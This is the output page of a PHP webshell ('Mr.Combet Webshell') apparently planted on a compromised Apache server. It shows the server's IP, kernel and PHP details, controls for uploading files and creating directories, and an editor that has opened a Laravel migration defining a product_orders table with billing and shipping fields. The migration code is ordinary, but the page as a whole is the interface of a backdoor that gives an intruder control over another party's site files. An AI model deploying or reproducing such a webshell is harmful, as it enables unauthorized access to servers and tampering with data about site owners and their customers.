Mr.Combet Webshell
Your IP :
3.22.187.170
Server IP :
185.136.159.155
Server :
Linux 185-136-159-155.cprapid.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software :
Apache
PHP Version :
8.1.29
Add File :
Submit
Add Directory :
Submit
Dir :
~
/
home
/
jaibalajigroup
/
www
/
core
/
database
/
migrations
/
Edit File Name :
2020_04_29_101508_create_product_orders_table.php
<?php use Illuminate\Support\Facades\Schema; use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class CreateProductOrdersTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('product_orders', function (Blueprint $table) { $table->bigIncrements('id'); $table->integer('user_id'); $table->string('billing_country'); $table->string('billing_fname'); $table->string('billing_lname'); $table->string('billing_address'); $table->string('billing_city'); $table->string('billing_email'); $table->string('billing_number'); $table->string('shpping_country'); $table->string('shpping_fname'); $table->string('shpping_lname'); $table->string('shpping_address'); $table->string('shpping_city'); $table->string('shpping_email'); $table->string('shpping_number'); $table->decimal('total', 11, 2)->nullable(); $table->string('method'); $table->string('currency_code'); $table->string('order_number'); $table->decimal('shipping_charge', 11, 2)->nullable(); $table->string('payment_status'); $table->string('order_status')->default('pending'); $table->string('txnid'); $table->string('charge_id'); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('product_orders'); } }
Save